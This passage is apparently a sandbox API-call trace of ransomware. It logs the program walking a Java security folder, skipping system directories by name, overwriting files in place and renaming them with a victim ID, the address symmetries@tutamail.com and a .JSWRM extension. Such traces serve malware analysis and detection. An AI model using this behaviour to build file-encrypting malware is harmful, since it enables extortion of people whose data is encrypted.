0x224d50 [0071.337] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0071.338] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0071.338] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0071.338] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0071.338] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0071.338] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0071.338] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0071.338] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0071.338] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0071.338] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224ee8 [0071.338] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0071.338] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224ee8 | out: hHeap=0x1e0000) returned 1 [0071.338] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23ef08 [0071.338] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0071.338] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0071.338] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\blacklist" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\blacklist"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\blacklist.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\blacklist.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0071.339] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ef08 | out: hHeap=0x1e0000) returned 1 [0071.339] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0071.339] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224b30 | out: hHeap=0x1e0000) returned 1 [0071.339] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c76e77, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c76e77, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c76e77, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4e5, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="blacklisted.certs", cAlternateFileName="BLACKL~1.CER")) returned 1 [0071.339] lstrcmpiW (lpString1="blacklisted.certs", lpString2=".") returned 1 [0071.339] lstrcmpiW (lpString1="blacklisted.certs", lpString2="..") returned 1 [0071.339] lstrcmpiW (lpString1="blacklisted.certs", lpString2="...") returned 1 [0071.339] lstrcmpiW (lpString1="blacklisted.certs", lpString2="windows") returned -1 [0071.339] lstrcmpiW (lpString1="blacklisted.certs", lpString2="recovery") returned -1 [0071.339] lstrcmpiW (lpString1="blacklisted.certs", lpString2="perflogs") returned -1 [0071.339] lstrcmpiW (lpString1="blacklisted.certs", lpString2="documents and settings") returned -1 [0071.339] lstrcmpiW (lpString1="blacklisted.certs", lpString2="$RECYCLE.BIN") returned 1 [0071.339] lstrcmpiW (lpString1="blacklisted.certs", lpString2="system volume information") returned -1 [0071.339] lstrcmpiW (lpString1="blacklisted.certs", lpString2="msocache") returned -1 [0071.339] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0071.339] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="blacklisted.certs", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0071.339] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0071.339] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="blacklisted.certs", cchWideChar=17, lpMultiByteStr=0x240fc0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="blacklisted.certs", lpUsedDefaultChar=0x0) returned 17 [0071.339] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0071.339] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0071.339] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="blacklisted.certs", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0071.339] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0071.339] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="blacklisted.certs", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="blacklisted.certs", lpUsedDefaultChar=0x0) returned 17 [0071.339] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0071.339] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0071.339] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0071.339] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0071.340] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0071.340] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0071.340] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\blacklisted.certs" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\blacklisted.certs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0071.340] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1253) returned 1 [0071.340] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.340] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4e0) returned 0x203550 [0071.340] ReadFile (in: hFile=0x458, lpBuffer=0x203550, nNumberOfBytesToRead=0x4e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesRead=0x345e89c*=0x4e0, lpOverlapped=0x0) returned 1 [0071.341] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.341] WriteFile (in: hFile=0x458, lpBuffer=0x203550*, nNumberOfBytesToWrite=0x4e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesWritten=0x345e898*=0x4e0, lpOverlapped=0x0) returned 1 [0071.342] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x203550 | out: hHeap=0x1e0000) returned 1 [0071.342] CloseHandle (hObject=0x458) returned 1 [0071.342] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x1f10b0 [0071.342] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0071.342] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0071.342] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0071.342] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0071.342] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0071.342] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0071.342] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0071.342] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0071.342] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0071.342] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x1fc808 [0071.342] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x21fab8 [0071.342] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0071.342] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x1ff448 [0071.342] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21fab8 | out: hHeap=0x1e0000) returned 1 [0071.342] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0071.342] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\blacklisted.certs" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\blacklisted.certs"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\blacklisted.certs.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\blacklisted.certs.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0071.343] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0071.343] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f10b0 | out: hHeap=0x1e0000) returned 1 [0071.343] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0071.343] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0071.343] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0071.343] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c76e77, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c76e77, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c76e77, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1c0eb, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="cacerts", cAlternateFileName="")) returned 1 [0071.343] lstrcmpiW (lpString1="cacerts", lpString2=".") returned 1 [0071.343] lstrcmpiW (lpString1="cacerts", lpString2="..") returned 1 [0071.343] lstrcmpiW (lpString1="cacerts", lpString2="...") returned 1 [0071.343] lstrcmpiW (lpString1="cacerts", lpString2="windows") returned -1 [0071.343] lstrcmpiW (lpString1="cacerts", lpString2="recovery") returned -1 [0071.343] lstrcmpiW (lpString1="cacerts", lpString2="perflogs") returned -1 [0071.343] lstrcmpiW (lpString1="cacerts", lpString2="documents and settings") returned -1 [0071.343] lstrcmpiW (lpString1="cacerts", lpString2="$RECYCLE.BIN") returned 1 [0071.343] lstrcmpiW (lpString1="cacerts", lpString2="system volume information") returned -1 [0071.343] lstrcmpiW (lpString1="cacerts", lpString2="msocache") returned -1 [0071.343] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cacerts", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0071.343] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cacerts", cchWideChar=7, lpMultiByteStr=0x345ebd8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cacerts", lpUsedDefaultChar=0x0) returned 7 [0071.343] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cacerts", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0071.343] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cacerts", cchWideChar=7, lpMultiByteStr=0x345eba8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cacerts", lpUsedDefaultChar=0x0) returned 7 [0071.343] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209440 [0071.343] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0071.343] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0071.343] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0071.343] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0071.343] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\cacerts" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\cacerts"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0071.344] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=114923) returned 1 [0071.344] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.344] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1c0e0) returned 0x24e1e0 [0071.344] ReadFile (in: hFile=0x458, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x1c0e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesRead=0x345e89c*=0x1c0e0, lpOverlapped=0x0) returned 1 [0071.442] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.442] WriteFile (in: hFile=0x458, lpBuffer=0x24e1e0*, nNumberOfBytesToWrite=0x1c0e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesWritten=0x345e898*=0x1c0e0, lpOverlapped=0x0) returned 1 [0071.443] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0071.444] CloseHandle (hObject=0x458) returned 1 [0071.444] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209350 [0071.444] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0071.444] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0071.444] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0071.444] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0071.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0071.444] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0071.444] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0071.444] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0071.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0071.444] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0071.444] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0071.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0071.444] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23ede0 [0071.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0071.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0071.444] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\cacerts" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\cacerts"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\cacerts.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\cacerts.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0071.445] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ede0 | out: hHeap=0x1e0000) returned 1 [0071.445] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209350 | out: hHeap=0x1e0000) returned 1 [0071.445] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0071.445] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c76e77, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c76e77, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c76e77, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x9a2, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="java.policy", cAlternateFileName="JAVA~1.POL")) returned 1 [0071.445] lstrcmpiW (lpString1="java.policy", lpString2=".") returned 1 [0071.445] lstrcmpiW (lpString1="java.policy", lpString2="..") returned 1 [0071.445] lstrcmpiW (lpString1="java.policy", lpString2="...") returned 1 [0071.445] lstrcmpiW (lpString1="java.policy", lpString2="windows") returned -1 [0071.445] lstrcmpiW (lpString1="java.policy", lpString2="recovery") returned -1 [0071.445] lstrcmpiW (lpString1="java.policy", lpString2="perflogs") returned -1 [0071.445] lstrcmpiW (lpString1="java.policy", lpString2="documents and settings") returned 1 [0071.445] lstrcmpiW (lpString1="java.policy", lpString2="$RECYCLE.BIN") returned 1 [0071.445] lstrcmpiW (lpString1="java.policy", lpString2="system volume information") returned -1 [0071.445] lstrcmpiW (lpString1="java.policy", lpString2="msocache") returned -1 [0071.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0071.445] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="java.policy", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0071.446] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="java.policy", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="java.policy", lpUsedDefaultChar=0x0) returned 11 [0071.446] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0071.446] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0071.446] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="java.policy", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0071.446] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="java.policy", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="java.policy", lpUsedDefaultChar=0x0) returned 11 [0071.446] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0071.446] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0071.446] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209440 | out: hHeap=0x1e0000) returned 1 [0071.446] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0071.446] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0071.446] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0071.446] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\java.policy" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\java.policy"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0071.447] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2466) returned 1 [0071.447] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.447] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x9a0) returned 0x23fc98 [0071.447] ReadFile (in: hFile=0x458, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x9a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0x9a0, lpOverlapped=0x0) returned 1 [0071.448] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.449] WriteFile (in: hFile=0x458, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x9a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0x9a0, lpOverlapped=0x0) returned 1 [0071.449] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0071.449] CloseHandle (hObject=0x458) returned 1 [0071.449] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0071.449] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0071.449] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0071.449] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0071.449] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0071.449] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0071.449] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0071.449] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0071.449] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0071.449] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0071.449] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0071.449] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0071.449] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0071.449] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0071.449] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\java.policy" (normalized: "c:\\program 